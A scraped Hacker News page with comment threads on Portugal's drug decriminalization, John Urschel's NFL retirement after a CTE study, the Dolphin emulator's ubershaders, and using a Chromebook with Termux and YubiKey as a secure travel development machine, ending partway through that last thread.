Addiction is not a moral issue; it should not be criminalized. It is a medical issue. It is a mental health issue. When it's caught early enough, and treated with the proper mental health regimen, it does not have to be debilitating.

Instead, what happened with the war on drugs was mass-market criminalization... essentially forcing alcoholics and addicts into debilitation (hiding/shame), leading to further desire for escapism through the addiction. It's a terrible cycle, and the worst part of it is that some counties have made things like DUIs into their bread-and-butter mainstream source of revenue.

It's hard to say what the trend today is going toward. The privatization of jails is especially disconcerting; like society wants to trick itself into thinking that the more people it has locked up the "safer" it is.


untangle 3 days ago 4 replies      
The singular focus on "drug deaths due to overdose" tells an important part of the story, but not the whole story. For example, per Wikipedia, drug use may have doubled after decriminalization.* If so, that's an acceptable tradeoff to me but may not be to others.

* https://en.wikipedia.org/wiki/Drug_policy_of_Portugal

drefgert 3 days ago 2 replies      
The critical part missing from Portugal's policy is that drugs must be legal to buy and sell (via controlled channels).

Decriminalizing use helps, but legalizing sales takes out the crime and ensures the health of users through clean product.

justaaron 3 days ago 0 replies      
I want to point out that this is merely a heroin-inspired "harm reduction" law that removes the criminal penalties for having up to an arbitrary number of days' supply of any particular illegal substance. (10 days)

It does not recognize any distinction between substances and retains a "shame on you" psy-ops bureau that users caught with minor amounts of said substances are referred to, in lieu of the criminal justice system. This "toxic-dependency" panel has sanctions available including monetary fines and revocation of ones passport or other travel restrictions, to bend one to their ways.

This set of laws does not treat the SUPPLY chain at all!

If one has an amount of substance greater than the threshold, one can expect charges of trafficking/distribution, which will then collapse after the 1-year investigation results in the non-election to pursue such charges, having meanwhile resulted in the de-facto punishment of a year of weekly (or some interval) police-station sign-ins and a form of house arrest.

It's not a complete set of laws, and while it did manage to dispatch the heroin crisis of years past, it doesn't make any distinction, and thus is impeding efforts towards home cultivation of cannabis being legalized, etc.

De-criminalization, like medical cannabis, has the unfortunate tendency of providing laurels to rest upon, and thus impeding further progress. (Observe Spain's cooperatives, where signed members cooperatively grow and share in the crop.)

Basically, Portugal has a very mature attitude to many things: letting the golden dreams of empire fade as they should, accepting that some people behave rashly and putting an emphasis on harm reduction, etc. The emergency services here generally are excellent, professional, and calm in demeanour. I don't think that in practice one notes any major difference in drug usage in society with regards to the rest of Europe; I think one simply notes a bit less paranoia.

By comparison, I find it very odd that more than 15 states in the USA have medical or legal cannabis, yet harm reduction for heroin seems to be missing, and hence I'll just say that some people like to learn the hard way :D

11thEarlOfMar 3 days ago 1 reply      
It would be illustrative to see a control of some type, perhaps deaths due to alcoholism. Seeing that trend against the heroin trend would help to illustrate the impact of decriminalization relative to other efforts or changes in law or society.
petre 3 days ago 1 reply      
Romania is in last place according to the chart in the article, and drug possession is a criminal offense in this country. It's punishable by two to five years in jail. The rehab is inside the penitentiary, so you first go to jail, then to rehab.

Also it's quite interesting how just about every country that's close to the Netherlands, save for France which criminalizes posession, is at the top of the chart.

I've been to Lisbon and was approached countless times on the street by shady individuals trying to sell drugs, usually mj/hash but also coke, maybe one time out of ten. This is not a widespread thing in the rest of Portugal, just in Lisbon's very touristy city centre.

wwwater 2 days ago 0 replies      
There is an amazing TED talk by Johann Hari on that topic https://www.ted.com/talks/johann_hari_everything_you_think_y...
tompazourek 3 days ago 3 replies      
When I saw the chart I thought, what's wrong with Estonia?
cpncrunch 3 days ago 2 replies      
In Canada we seem to have de-facto decriminalization for possession for personal use. The problem we have now is that 80% of heroin is laced with fentanyl (at least in Vancouver), and it's causing a huge overdose problem. Even cocaine and MDMA are now sometimes cut with fentanyl.

Not sure what the solution is, but perhaps a combination of stronger penalties for dealers, more resources for treating addiction, and legalising weed.

randyrand 3 days ago 0 replies      
> People caught with less than a 10-day supply of a drug

That's a tiny amount. Punishing people who like to buy in larger quantities for convenience seems silly. They should have come up with another, or a higher, threshold to determine who the dealers were.

perilunar 3 days ago 0 replies      
> As João Goulão, the architect of Portugal's decriminalization model, told Hari, "using drugs is only a symptom of some suffering, and we have to reach the reasons."

Not necessarily. Using (harder) drugs is no more an indication of mental health problems than using alcohol. Many people use drugs recreationally without becoming addicted.

marze 2 days ago 0 replies      
Is this a correct summary?

150 deaths/million/year

3 deaths/million/year

randomstudent 3 days ago 1 reply      
This article is very weak... They cherry-pick a single metric (overdose-related deaths) and use it to prove Portugal's policy is the best thing ever.

Other relevant metrics: Has drug use increased or decreased? What about the burden of disease associated with drug use? Also, even more importantly: what has happened to deaths in other countries over time?

Odenwaelder 3 days ago 0 replies      
Has this guy walked the streets of Lisbon? You can't walk 50m without being offered drugs. It sucks.
crimsonalucard 1 day ago 0 replies      
What does it mean to have a lower OD rate if decriminalization caused the entire population to become addicts? There needs to be a more comprehensive and less biased examination of what happened in this country. Does anyone know the addiction rate vs. other countries?
vivekd 3 days ago 1 reply      
Counterpoint: overdose deaths increased during some years, and drug use has markedly increased:

Also, the chart supporting fewer overdose deaths actually seems to be a chart of all drug-induced deaths, not just overdose deaths, which means it could include deaths from HIV/AIDS, once a big killer of heroin users and something we can now treat much better.


Ravens OL John Urschel, 26, retires abruptly, two days after CTE study espn.com
484 points by petethomas  4 days ago   335 comments top 28
aresant 4 days ago 9 replies      
A few colorful facts to the story here:

1) 3 years of service vests into NFL pension plan, he just hit qualification - value pegged at $21,360 a year for life (3)

2) He has not publicly commented on his retirement or reasons for it.

3) He has a hugely awesome secondary option - doctorate of math at MIT

4) He was at end of his rookie contract, next year would be the "in the money" year for him so he is clearly leaving a lot of cash on the table.

5) Over three years he "only" earned ~$1.8m http://www.spotrac.com/nfl/baltimore-ravens/john-urschel-145... - which after tax is 7 figures but still not a lot.

6) He has been notoriously thrifty, living on $25k a year and driving a used car (2). So I would imagine at some level he has been planning this outcome, or leaving the option wide open.

(1) https://www.washingtonpost.com/news/early-lead/wp/2017/07/27...

(2) http://www.baltimoresun.com/sports/bs-sp-ravens-john-urschel...

(3) http://firstquarterfinance.com/nfl-pension-plan-retirement-p...

magic_beans 4 days ago 5 replies      
"Urschel is pursuing his doctorate at the Massachusetts Institute of Technology in the offseason, focusing on spectral graph theory, numerical linear algebra and machine learning."

This guy has a back-up plan. Good man.

meri_dian 4 days ago 2 replies      
He clearly loves math so the CTE study may just have been the straw that broke the camel's back. He may have been yearning to fully devote himself to math for a while now.

Regarding the broader debate that seems to be swirling along the lines of 'should we ban Football or not', I strongly believe we should not.

If parents want to prevent their kids from playing football, great, that's their choice to make. But if they allow them to play, we have to keep in mind that only a very small percentage of players will continue on to play in college, and then only a fraction of those will continue on to the NFL. I'm sure that people who play youth and high school football but stop after HS graduation have a much lower incidence of CTE than players who continue on at the collegiate and professional levels. So for the vast majority of football players, CTE isn't much of a risk.

Because those who do reach the highest levels of the sport make tremendous amounts of money, as long as they are aware of the risks, they should be able to make the decision for themselves.

grogenaut 4 days ago 3 replies      
Summary: a National Football League player and math PhD student at MIT, John Urschel, abruptly retired two days after a study showed that 99% of the former NFL players in its study group had chronic traumatic encephalopathy (CTE). This is right before training starts for the season.

Edit: updated. I'll point out that any summary is going to miss some facts, since it's a summary. But I think people might be more likely to read the article if they could decipher the title. I like the Ravens, and from the title I assumed this was the CTO of a YC game-company startup who quit.

ineptech 4 days ago 15 replies      
Has "whether you let your kids play football" joined the long, long list of boolean values that separate members of the Red Tribe from the Blue Tribe?

If not, I think it's inevitable that it will. Someone will try to get their school to close its football program, someone else will complain that the health dangers are exaggerated by the liberal media because football is a red-state pastime, and pretty soon it'll be "Why do you hate America and apple pie" vs "Why do you want children to suffer and die".

Azkar 4 days ago 14 replies      
So what's the big picture here? We've suspected for years that football leads to brain trauma. Does that mean the NFL should shut down? Should they continue to operate as normal?

There have been efforts recently to make the game safer for players, but the number of concussions and injuries seen every season doesn't seem to be decreasing.

Can you make the game "more safe" without drastically changing it? Any game played at this speed, by players this strong, is going to have some inherent danger to it.

Do we just need to make the effects more widely known and understood by the players, maybe treat football like smoking with warnings printed on the outside of helmets? Anything less than that and you run the risk of not making your point.

Should I feel bad as a fan for watching football? Is it any worse than buying clothing made by child labor from a third world country?

tnecniv 4 days ago 1 reply      
I'm amazed he had time to play and do a PhD at MIT. I imagine even in the off season those guys are very busy.
ilamont 4 days ago 1 reply      
He was profiled in the most recent issue of Tech Review. He said his mother has been asking him to retire for a few years, but he still loved the athletic challenge of playing against top players.
zitterbewegung 4 days ago 1 reply      
Has he ever been recorded giving a lecture about the math that he does? I found a paper of his [1]. Looking at his Wikipedia page, he specializes in spectral graph theory, numerical linear algebra and machine learning. Following his next steps might be interesting too. Might set up a Google Scholar alert.

[1] http://www.global-sci.org/jcm/openaccess/v33n2/pdf/332-209.p...

kraig911 4 days ago 0 replies      
Well, I think the results of the CTE study showed him that no matter how much he wanted both things, only one of them could be consciously chosen, while the other would be all he had left if he continued.
otoburb 4 days ago 0 replies      
>>In August 2015, he suffered a concussion when he went helmet-to-helmet with another player and was knocked unconscious.

"I think it hurt my ability to think well mathematically," Urschel said. "It took me about three weeks before I was football-ready. It took me a little bit longer before my high-level visualizations ability came back."

Losing a high-level cognitive ability must be terrifying; the flood of relief upon regaining his ability (probably slowly?) after 4+ weeks must have made him deeply question his continuing commitment, and then the CTE study pushed him over the edge.

gburt 4 days ago 0 replies      
This is a strong testament to the value of the research. The researchers may have saved this guy's brain, if not his life.
therajiv 4 days ago 0 replies      
I ran into this guy randomly at MIT once, during the offseason (last February). He was such a chill guy. Hearing this news makes me like him even more - he's not letting one of his passions get in the way of another.
backtoyoujim 4 days ago 2 replies      
Trying to watch the NFL reminds me of the moment in "Django Unchained" when we meet DiCaprio's character sitting in a chair watching two slaves beat each other to death.

That moment of that movie comes to me every time the TV producers cut to the team owner sitting in their fancy box in their fancy chair paying lots of African American men to beat each other up for our entertainment and profit.

keeptrying 4 days ago 3 replies      
There is a significant bias here in that it's 99% of NFL players' brains *which had been donated for study*.

But honestly, even if you could peek into every NFL player's brain, I'm sure the incidence after 4-5 years of playing would be orders of magnitude greater than what's found in the general population.
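The commenter's point about selection bias can be made concrete with a toy Bayes calculation. Every number below is invented purely for illustration and is not taken from the actual study:

```python
# Illustrative only: how selection bias can inflate a conditional rate.
# All numbers below are made up for the sake of the arithmetic.

def p_condition_given_donated(base_rate, p_donate_if_sick, p_donate_if_healthy):
    """P(CTE | brain donated), via Bayes' rule over a player population."""
    sick_donors = base_rate * p_donate_if_sick
    healthy_donors = (1 - base_rate) * p_donate_if_healthy
    return sick_donors / (sick_donors + healthy_donors)

# Suppose (hypothetically) 30% of all former players have CTE, but families
# of symptomatic players are 20x more likely to donate the brain for study.
rate = p_condition_given_donated(0.30, 0.50, 0.025)
print(f"{rate:.0%}")  # → 90%: the donated sample looks far worse than the population
```

Even a modest donation skew makes the donated sample dramatically unrepresentative, which is the bias being described.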

sna1l 4 days ago 3 replies      
For someone so smart, I'm a little surprised it took this CTE study to push him over the edge.

But maybe he wanted more conclusive data before leaving a job which paid him millions. :)

balls187 4 days ago 0 replies      
"NFL Mathematics Expert"

That's pretty amazing. He scored 43/50 on the Wonderlic (highest in 2014).

Ryan Fitzpatrick scored a 49/50, though it was in the older format.

CurtMonash 4 days ago 2 replies      
I abruptly stopped being a football fan last November.

The immediate reason was Bill Belichick staking his own reputation on Donald Trump's assaults on the media, in a close state in a close election. But CTE was making it hard to remain a football fan anyway.

dragontamer 4 days ago 3 replies      
Football may get a lot of study recently because it's one of the most popular sports.

But basketball injuries can ruin you for life as well. I have a cousin who has severe amnesia after getting knocked out during a basketball game. It's like years of his life were wiped away after his concussion. He was a straight-A student too; these sorts of things are severely damaging to a student's career.

Brain injuries exist in a lot of sports. Football is particularly dangerous but the dangers in other sports (Boxing, MMA, Basketball, Soccer) are severe as well.

jrwiegand 4 days ago 0 replies      
Yeah, it is likely the smartest decision for him. I have watched him play his whole career (Ravens fan). He is good but he would have likely bounced around the league as a backup and got cut in the next few years due to age. With this decision he is starting a career that will be enjoyable, safe and well paying. You cannot beat that. Good luck #64.
matt_s 4 days ago 1 reply      
Something that wasn't pointed out in the article is that in the vast majority of cases where an NFL player's family donates the brain for CTE study, the player was already showing some degenerative symptoms.

They can't test for CTE on living people and if someone has it but say dies from a heart attack before ever showing symptoms, they likely aren't donating to the CTE study.

Angostura 4 days ago 0 replies      
>In August 2015, Urschel suffered a concussion when he went helmet-to-helmet with another player and was knocked unconscious.

>"I think it hurt my ability to think well mathematically," Urschel said. "It took me about three weeks before I was football-ready. It took me a little bit longer before my high-level visualizations ability came back."

Dirlewanger 4 days ago 1 reply      
Funnily enough, this story also isn't prominently displayed on their homepage aside from the sidebar in tiny font. Apparently within hours of the NYT study being released, ESPN's reblogging of it disappeared to several page refreshes down their homepage. I can't wait for them to be significantly downsized if not dissolved completely.
usgroup 4 days ago 0 replies      
I admire this sort of decision making. In particular, I admire that he took the risk playing football in the first place but called it at some prerequisite level of damage he was willing to take. I'd imagine that is something he put a hard stop on before embarking on the career: "two concussions max then I'm out whatever".
cwkid 4 days ago 0 replies      
This is notable, because Urschel has previously written a piece explaining why he was willing to play football given the risks (https://www.theplayerstribune.com/why-i-play-football/).
ugh123 4 days ago 0 replies      
Wow, shitty auto-play video without ability to pause. Be warned!
bitL 4 days ago 0 replies      
Smart. Congrats! Find another sport for needed challenge ;-)
Ubershaders: A Ridiculous Solution to an Impossible Problem dolphin-emu.org
751 points by voltagex_  2 days ago   87 comments top 26
et2o 1 day ago 2 replies      
What an awesome writeup. I am not even really personally invested in the problem as I don't play older video games, but I loved reading the story. I wish other open source projects would do similar writeups when they reach major accomplishments.

If I just saw "specialized shaders replaced with ubershaders" on a feature update, I probably wouldn't think there was much of a story to it.

AceJohnny2 1 day ago 0 replies      
Is there any higher accolade in the field than having John Carmack say "Dolphin updates are wonderful system engineering articles." ?


quotemstr 1 day ago 1 reply      
This is an amazing article. I _love_ technical problems for which the prevailing consensus moves from "this isn't a problem" to "this problem is impossible to fix" to "the proposal fix could never work" to "doing it right would be too much work" to "the solution was inevitable".
bananaboy 1 day ago 0 replies      
This is really great stuff from the Dolphin team!

We took a similar approach when building de Blob 2 for Wii, X360, and PS3. We defined all our materials in terms of TEV stages. On the Wii that was used to set up the TEV when rendering. For X360 and PS3 we had an ubershader that emulated the TEV stages. This made it much easier for the artists; they built all materials in one tool in terms of what are essentially register combiners. We also allowed them to create more complex materials for X360/PS3 that would override the base material and do things that the Wii didn't actually support.
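For readers unfamiliar with the idea, the trade-off both Dolphin and a TEV-emulating port face can be sketched in a few lines of Python. The "stages" below are a drastic simplification of real TEV register combiners, and every name is made up for illustration:

```python
# Sketch of the ubershader idea: instead of generating a specialized shader
# per pipeline configuration (paying compile cost the first time each config
# appears), one generic "ubershader" interprets the configuration at run time.
from typing import List, Tuple

# A toy "stage" is (operation, constant); a config is a list of stages.
Stage = Tuple[str, float]

def ubershader(config: List[Stage], color: float) -> float:
    """Generic path: branches on the config for every input."""
    for op, k in config:
        if op == "add":
            color += k
        elif op == "mul":
            color *= k
        elif op == "sub":
            color -= k
    return color

def specialize(config: List[Stage]):
    """Specialized path: 'compile' the config once into a closure."""
    ops = list(config)
    def shader(color: float) -> float:
        for op, k in ops:  # in a real compiled backend these branches are gone
            color = color + k if op == "add" else color * k if op == "mul" else color - k
        return color
    return shader

cfg = [("add", 0.5), ("mul", 2.0)]
fast = specialize(cfg)                       # pay "compilation" once up front
assert ubershader(cfg, 1.0) == fast(1.0) == 3.0
```

The generic path trades per-pixel branching for the ability to handle any configuration immediately, which is exactly the stutter-vs-throughput trade the article describes.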

davidmurdoch 2 days ago 1 reply      
My favorite part: "Despite being around 90% complete, the last 90% still remained to be done"
rrradical 1 day ago 0 replies      
"Over the past few years, we've had users ask many questions about shader stuttering, demand action, declare the emulator useless, and some even cuss developers out over the lack of attention to shader compilation stuttering."

Ugh, it pains me to imagine users that would be anything but appreciative towards these developers, but kudos to the devs for using that abuse as inspiration.

the_mitsuhiko 2 days ago 2 replies      
> macOS Graphics Drivers are Still Terrible

There it is again :(

lordleft 2 days ago 0 replies      
This was a really well written overview of a technical puzzle and its eventual resolution. Loved the lucidity of the prose!
chris_wot 2 days ago 3 replies      
Dear God, the solution is insane! That is mind-blowing... emulating the whole pipeline?!?!

People who do emulation are, quite simply, the very, very best of us.

My other takeaway is: just avoid an Nvidia card if you can.

FRex 1 day ago 1 reply      
Call me old-fashioned or stupid (just not nostalgic; the best I ever owned was a Pegasus, a hardware clone of the NES/Famicom), but whenever I see these issues with older Sony or Nintendo stuff I am in awe.

Today's consoles seem like repackaged PCs with few changes, but the older ones seem like actual dedicated gaming hardware, especially the PS2 with its Emotion Engine and the PS1 chip as a disk controller. What the hell (in a good way)?!

Fiahil 1 day ago 1 reply      
I never thought people would be working full time on emulator projects. I guess I really underestimated the amount of work that goes into them.
slaymaker1907 1 day ago 4 replies      
Why not take a profiling approach and cache the configurations rather than the compiled shader? You could then compile them on startup. By caching the configurations, you could then share this data between hosts and don't have to invalidate them as often.
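A rough sketch of what this comment is proposing, with hypothetical names and a stand-in compile function (this is not how Dolphin actually stores its cache): persist the *configurations* seen during play, which are cheap, driver-independent, and shareable between machines, then warm-compile them at startup.

```python
# Sketch: cache shader *configurations* (not compiled binaries) to disk,
# and compile every previously seen config up front at startup.
import json, os

CACHE = "seen_configs.json"  # hypothetical cache file

def load_configs() -> set:
    """Read back the set of configs seen in earlier sessions."""
    if os.path.exists(CACHE):
        with open(CACHE) as f:
            return {tuple(c) for c in json.load(f)}
    return set()

def save_configs(configs: set) -> None:
    with open(CACHE, "w") as f:
        json.dump(sorted(configs), f)

def warm_compile(configs, compile_fn):
    """At startup, compile everything in the cache before gameplay begins."""
    return {cfg: compile_fn(cfg) for cfg in configs}

# During play, record any newly encountered config:
seen = load_configs()
cfg = ("alpha_blend", "two_textures")  # stand-in for a real pipeline state
if cfg not in seen:
    seen.add(cfg)
    save_configs(seen)
```

Because only abstract configurations are stored, the cache survives driver updates and could in principle be shipped between users, which is the advantage the commenter is pointing at; the first-ever encounter of a config still stutters, which is the gap the ubershader approach closes.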
sltkr 1 day ago 0 replies      
Fascinating read!

The final approach of interpreting the shaders initially, while compiling them in the background for greater performance, sounds very similar to what just-in-time compilers do.

If you think about it, the problems they face are also kind of similar: both systems are confronted with unpredictable, dynamic "source code", and both want to achieve both high performance while avoiding the lag introduced by ahead-of-time compilation, so it makes sense that a similar solution approach might work.
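The parallel can be sketched as a toy tiered-execution class; the timing constants and names below are invented for illustration:

```python
# A toy version of "interpret now, compile in the background": requests are
# served by a slow generic path until a background thread finishes building
# the specialized one, which then transparently takes over.
import threading, time

class TieredShader:
    def __init__(self, config):
        self.config = config
        self.compiled = None
        threading.Thread(target=self._compile, daemon=True).start()

    def _compile(self):
        time.sleep(0.05)             # stand-in for a slow driver compile
        k = sum(self.config)         # "compiled" form precomputes the work
        self.compiled = lambda x: x + k

    def run(self, x):
        if self.compiled is not None:
            return self.compiled(x)  # fast specialized path
        return x + sum(self.config)  # slow interpreted path, but no stall

s = TieredShader([1, 2, 3])
first = s.run(10)   # served immediately, almost certainly interpreted
time.sleep(0.2)
later = s.run(10)   # compiled path has taken over by now
assert first == later == 16
```

The key property, as with a JIT's baseline tier, is that both paths return identical results, so the caller never observes the hand-off, only the latency difference.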

bpicolo 1 day ago 0 replies      
The Dolphin project always has amazing writeups for complicated technical problems. Really love these. Amazing work from that whole team
misingnoglic 1 day ago 0 replies      
It always amazes me how dedicated and talented the engineers who work on these projects are, amazing :)
Nican 1 day ago 0 replies      
The dolphin emulator's blog is doing awesome blog posts as usual. Reminds me of how JavaScript compilers[1] also compile several versions of the same function, as the interpreter gains more insight on how the function is used.

[1] https://wingolog.org/archives/2011/07/05/v8-a-tale-of-two-co... (Wow, 2011, time goes by fast)

br1 19 hours ago 0 replies      
Reminds me of https://01.org/fast-ui-draw/blogs/krogovin/2016/fast-ui-draw..., a Canvas implementation from Intel that also uses a uber shader.
ginko 1 day ago 0 replies      
This approach actually seems more straightforward and easier to maintain than the original shader cache system. Of course, when Dolphin was originally written this wasn't feasible on the hardware of the time, but nowadays I'd say shaders of this complexity aren't that unusual.
spondyl 1 day ago 0 replies      
Dolphin always do great writeups and this is no different. Real nice!
nhaehnle 1 day ago 1 reply      
Now refactor everything so that the purpose-built shaders are actually generated from the ubershader simply by hard-coding the various decision points, possibly using preprocessor tricks? Seems like a natural next step that should be able to simplify the emulator a lot...
phkahler 1 day ago 0 replies      
In short, they went from shader translation to emulation (on the GPU) which eliminates the delays of dynamic translation. Fortunately the emulation is fast enough that it works great.
randyrand 1 day ago 2 replies      
does anyone know what the interpreter actually needs to interpret?

what does the code look like?

wellsjohnston 1 day ago 0 replies      
Metroid Prime was so good.
throwaway0to1 1 day ago 1 reply      
All this work and you can buy a used GameCube system for $50 USD. What's the point?
libeclipse 1 day ago 0 replies      
> Blog tags

 3d 4.0 5.0 60FPS Accessory adreno amd Analysis android announcement arm audio bestof bug bugfix Cheats Commemoration D3D D3D9 Datel driver Factor5 Feature Removal Foundation Gamehacks gpu Graphics Hardware HD hle intel Legal Licensing mali mesa Netplay new feature nvidia OGL Patches performance progress report Qt qualcomm release releasecandidate Review shieldtv stereo stereoscopy technical ubershaders ui Unlicensed video vulkan Wii wiimote Wiimote Wind Waker

peterburkimsher 1 day ago 2 replies      
This is incredible work. Predicting, sharing, asynchronous compilation, and reverse-engineering the pipeline are all very creative solutions to a really difficult problem. As I understand, deep learning basically runs graphics cards backwards to generate text from images.

How can we apply these excellent algorithms to machine learning?

How Chrome OS, Termux, YubiKey and Duo Mobile make for great usable security lessonslearned.org
467 points by walterbell  5 days ago   170 comments top 42
serf 5 days ago 4 replies      
So, be inconvenienced in every aspect important to a dev, but gain a bit of confidence in your machine (as long as you trust Big G)?

Verified boot seems like the only advantage here. You can readily buy a business-grade laptop with a TPM on eBay for 40 bucks, and it doesn't require reliance on Google or the use of a neutered OS. (Yes, yes, it's secure. It's a users' platform. Development on Chrome OS at this point is an act of masochism.)

If secure travel is your thing, stash your data on a cloud provider and pull it later after you arrive at your destination. Go whole-hog and travel without an SSD and buy a cheap one at your destination with cash. Sprinkle in some libreboot for more confidence.

It'll still be cheaper than a 200 dollar Chromebook, and you probably won't have to deal with some of the world's worst chiclet keyboards.

P.S. don't travel with a yubikey that isn't partnered with another. Would be a bummer to lose.

AdmiralAsshat 5 days ago 7 replies      
I'm not sure how much extra "security" you're really getting out of staying strictly within ChromeOS. Yes, Secure Boot is disabled. However, the ChromeOS partition is still encrypted, and you can manually encrypt any of your crouton chroot environments, so someone looking at the thing still wouldn't be able to peek into the contents. If you're asked, "Why is this in Developer Mode?", you can answer, "I'm a developer."

Additionally, once Developer Mode is enabled, you must hit Ctrl+D to move past the warning screen every time. It is incredibly easy to inadvertently hit Enter or Spacebar, and then have the Chromebook wipe itself and restore to factory settings. I've done it inadvertently myself, and have heard multiple reports of a developer's spouse/child accidentally clicking it, too. Unless a Border Patrol agent knew exactly what they were doing, I'd be willing to bet they'd accidentally wipe it as well.

Finally, while I'm aware that disabling Secure Boot in theory opens you up to an Evil Maid attack, what is the likelihood that border patrol/customs would have a malicious OS on hand, and the know-how to flash it? Worst-case scenario, if you suspect they've tampered with the OS, simply hit Spacebar yourself as soon as you get it back, restore Secure Boot, and then start over from scratch!

As an aside, if you are confined to ChromeOS, I highly recommend Caret as an editor. It's a FOSS, Sublime clone chrome app that works swimmingly on Chromebooks.

Sodman 5 days ago 1 reply      
I've been running the Chromebook Pixel 2015 as my primary dev machine since it came out. Unlike the author however, I've opted for the less-secure "dev mode" on the laptop, and do everything in crouton. (Java web / Android, mostly).

It may not be as secure, but it's hella convenient (still use 2FA). ChromeOS boot is < 5 seconds, and I just stay there for web browsing / netflix. Dropping into crouton is another < 5s when I need to do dev work, or play steam games.

Everything important on the laptop is backed up to some cloud service or another, but it's expensive enough that I'd be distraught if I lost it (plus they stopped selling them).

I'd be more worried about somebody straight up stealing the laptop than any other security risks I may be running by running in dev mode.

I love the idea of natively developing in ChromeOS, but at this point it just seems like more hassle and fighting the system than it's worth.

le-mark 5 days ago 1 reply      
This blog post details using a chromebook as a temporary device, such that you can travel with a blank machine, and provision at your destination with the data and apps you may need:

> It's pretty neat to consider the possibility of pre-travel "power washing" (resetting everything clean to factory settings) on an inexpensive Chromebook and later securely restore over the air once at my destination. ... the engineering challenge here was to find something powerful enough to comfortably use exclusively for several days of coding, writing, and presenting, but also cheap enough that should it get lost/stolen/damaged, I wouldn't lose too much sleep. ... I could treat it as a burner and move on.

Edit: I've been using a de-chromed Chromebook for over a year as my primary dev machine and really like it. I developed and launched one side project with it. The model I have (Acer C720) is a dual-core Celeron with 2GB of RAM, and I upgraded the M.2 SATA SSD to 120GB. For Python/PHP/Ruby, it's great. I would not do Java development on this setup, though. Java IDEs eat battery life, and I imagine JVM startup time is a burden on this, although I haven't even installed Java to find out.

Edit 2: to clarify, this is not about removing chromeos, but to use chromeos for it's security features. The article goes over using Termux to get a basic development/work environment setup on chromeos. Plus a lot other helpful tips.

I offered my experience de-chroming as an example, I really like the platform. Apologies if that was confusing.

andrepd 4 days ago 1 reply      
So, the solution to the uncertain threat of airlines picking through your luggage and stealing your computer or its data is... handing your data over to somebody who is certainly spying on you and whose business model is to comb over your data.

How is this not "you won't catch me, I'll just throw myself off a bridge"?

Also, Termux has ~600 packages. Debian has 50,000. Beyond the basics, you're liable to need packages you just don't have in Termux, which makes it a serviceable environment in a pinch, but not one where you want to do your real work.

pilif 5 days ago 3 replies      
> When things get completely borked (which in two weeks of heavy use only happened a couple of times for me)

how are people willing to live with this? I would be furious if I had to lose all my state and (for all intents and purposes) restart my machine multiple times in two weeks.

And if this "borking" happens right before or during a presentation (the author was writing about using this setup for giving talks), it would be very embarrassing for me and extremely annoying for the audience.

A work/presentaion machine has to be rock solid for me. No compromises, no workarounds and most certainly no "completely borked". Just pure solid.

devy 5 days ago 5 replies      
One of the BIGGEST drawbacks of using a Chromebook with an 11.6-inch screen, which nobody here has mentioned yet, is the grainy, crappy 1366x768 screen resolution! I've been a longtime Mac guy; anything inferior to a Retina display will considerably strain my eyes until I get used to it. The Dell XPS 13 included.
fredley 5 days ago 3 replies      
I tried using a Chromebook as a dev machine several years ago - before Android apps. The chroot situation worked well enough, but the dev-mode boot was a deal-breaker.

Back then, if a Chromebook's local storage filled up, it would factory-reset itself. Is this still the case? This is one big thing keeping me from trying this again (which I'm very tempted to do so after reading this article). Investing in setting up a dev environment like this is fun, but only the first time around...

mkohlmyr 5 days ago 1 reply      
I used my CB30 as a dev machine for a little while, both using cloud environments (koding, codeanywhere) and using vscode under crouton.

It is so close to being usable. It is such a user friendly operating system, it just falls short on a few significant fronts.

1. Developer mode should be friendlier to use (no horrible noises on boot, no delayed boot time).

2. It needs support for electron-based/alike apps to run natively in browser windows without crouton. E.g. vscode.

Aissen 5 days ago 2 replies      
Regarding the TOTP app, I generally prefer FreeOTP to Google Authenticator/Duo/Authy, etc. It might not provide push codes, but at least the implementation is Open Source and the binaries come from a trusted source.
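For context, TOTP is an open standard (RFC 6238, built on RFC 4226's HOTP), which is part of why independent open-source implementations like FreeOTP can interoperate with the rest. A minimal sketch, checked against the RFC's published test vector:

```python
# A minimal RFC 6238 TOTP implementation: there is no magic in any of these
# authenticator apps, just HMAC-SHA1 over a shared secret and the clock.
import hashlib, hmac, struct, time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC the counter, then dynamically truncate."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, at=None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time."""
    t = time.time() if at is None else at
    return hotp(secret, int(t // step), digits)

# RFC 6238 Appendix B test vector (SHA-1, 8 digits, T = 59s):
assert totp(b"12345678901234567890", at=59, digits=8) == "94287082"
```

Push-based codes like Duo's are a different (proprietary) protocol; the sketch above covers only the standard six-to-eight-digit rolling codes.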
VikingCoder 5 days ago 0 replies      
I bought the exact same machine, Samsung Chromebook 3, as soon as I realized I could run Termux on it.

I'm using it to poke at languages I'd normally never have the time to experiment with.

I'm on the train for about an hour every day, and I wouldn't feel comfortable with a "real" laptop - too likely to be stolen. But for $169? Not such a big loss.

I'm also really excited about how rock-solid this thing is, as a way to hand a kid a computer that can really teach them programming.

g00gler 5 days ago 1 reply      
Don't do it!

I got a Lenovo 14" IdeaPad N42-20 and desktop to replace my 256gb MacBook Pro.

It turned out to be a bad idea, mostly because the screen is terrible. It's the same resolution as the Samsung 3 mentioned in the article.

It also seems so small compared to a 15". Side-by-side windows isn't very nice, either.

I find myself working less because I don't feel like sitting at my desk or using the Chromebook.

andmarios 4 days ago 1 reply      
As a side point about Termux, Android 7 finally stopped hijacking the control+space combination, so you can use emacs efficiently.

Termux is really useful, giving you an almost complete linux environment in Android phones and tablets. You can install it via Google Play, no need for root or any modification to your device. Add an external keyboard and you can work on the go.

atopuzov 5 days ago 2 replies      
I love my C201, also not very expensive. I opted for the 4GB version. My first setup was Chrome OS + crouton, then I moved to Linux on an SD card. I noticed I never booted into Chrome OS anymore, so I got rid of it.
chx 5 days ago 1 reply      
In March, we have seen reports of Android Studio possibly coming to Chrome OS. Android Studio would mean IntelliJ IDEA and the entire family of IntelliJ IDEs. That would make this an even better idea.
qb45 4 days ago 1 reply      
Nearly every how-to and blog post I've found on "Chromebooks for developers" essentially starts with either: "Boot into Developer Mode" or "Install Debian/Ubuntu as the main OS". I'll just say it: This is bad advice. It would be akin to recommending that friends jailbreak their shiny new iPhone. You're obviously free to do as you wish with your own gear, but recognize that at Step 1, you'll have lost most of the core security features of Chromebook

